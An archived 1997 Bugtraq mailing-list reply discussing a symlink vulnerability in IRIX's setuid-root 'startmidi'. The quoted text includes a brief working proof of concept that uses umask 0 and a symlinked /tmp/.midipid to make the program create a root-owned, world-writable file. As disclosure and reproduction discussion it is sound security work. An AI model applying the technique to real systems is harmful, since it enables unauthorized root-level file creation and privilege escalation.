[4028] in bugtraq
Re: IRIX: Bug in startmidi
daemon@ATHENA.MIT.EDU (Astley Chan)
Mon Feb 10 04:03:44 1997
Date: Mon, 10 Feb 1997 12:52:55 +0800
Reply-To: Astley Chan <astley@DMF328.UST.HK>
From: Astley Chan <astley@DMF328.UST.HK>
To: BUGTRAQ@netspace.org
In-Reply-To: <Pine.A41.3.95.970209205954.44418C-100000@t1.chem.umn.edu> from
"Yuri Volobuev" at Feb 9, 97 09:20:36 pm
> > Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
> > noticed a little suid-root program called 'startmidi' which hides in
> > /usr/sbin. When run, this program creates various files in /tmp. You
> > guessed it, it respects umask and follows symlinks. Comme ca:
> >
> > % umask 0
> > % ln -s /blardyblar /tmp/.midipid
> > % startmidi -d /dev/ttyd1
> > % ls -l /blardyblar
> > -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
> > % stopmidi -d /dev/ttyd1
>
> eh... that's strange. I was looking at startmidi a while back, but didn't
> find any root holes. Now I look again, still nothing. Indeed, on my 5.3
umm..I can successfully create file owned by root..
> You must have some special configuration, I recon. On the box I was testing
I don't think it's special to his machine, I've got the same behaviour
as described (though stopmidi can't remove the file already in /tmp).
astley
